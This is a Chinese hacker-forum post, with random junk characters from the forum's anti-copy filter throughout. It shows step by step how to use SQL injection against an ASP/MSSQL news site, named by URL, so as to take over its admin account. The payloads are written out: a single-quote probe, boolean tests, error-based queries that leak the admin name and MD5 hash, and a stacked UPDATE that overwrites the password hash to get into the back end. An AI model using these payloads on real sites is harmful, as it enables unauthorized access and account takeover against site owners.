经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。
8 l1 g7 @2 G6 O8 ]% B9 Z) a可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)! S0 H/ a8 c6 R! G* m
测试如下:
5 q" A- H3 i, L5 t9 L4 vhttp://www.tmdsb.com/news.asp?id=121
7 B- D0 ?9 v$ l7 _/ u在地址后输入单引号,显示2 N( Z- _% `1 N+ d T* }# |
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’/ p& n# ~! N- Y, y
字符串 ’’’ 之前有未闭合的引号
: f+ {( V7 K* m( y e( U. y/news/tmdws.asp,行63
/ d9 f: U& A1 Z8 ?% L说明没有过滤单引号且数据库是MSSQL.
5 T' V+ V* P9 Y- W: pand 1=1正常。and 1=2出错。肯定存在注入
1 {$ C, r; ~ r7 a接着输入" E) i* W$ G8 O8 F6 t1 i: d* q* P
http://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
2 W. f. L) @( d$ D5 k# g* G* @得到帐号为:admin) w) S7 h) ~# Z* d8 G& }8 @2 m. E
http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin): y- A! g# _8 [5 @1 _' F, ~* d& L
得到密码为:a4716077c2ba075c
) X2 F5 o9 {; b/ l3 w, s接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433: J9 p. j; p9 ~) A M3 I
命令如下 :
' X( W5 S9 U3 d+ r! @( t;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–" N6 i7 ]6 ?: X
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41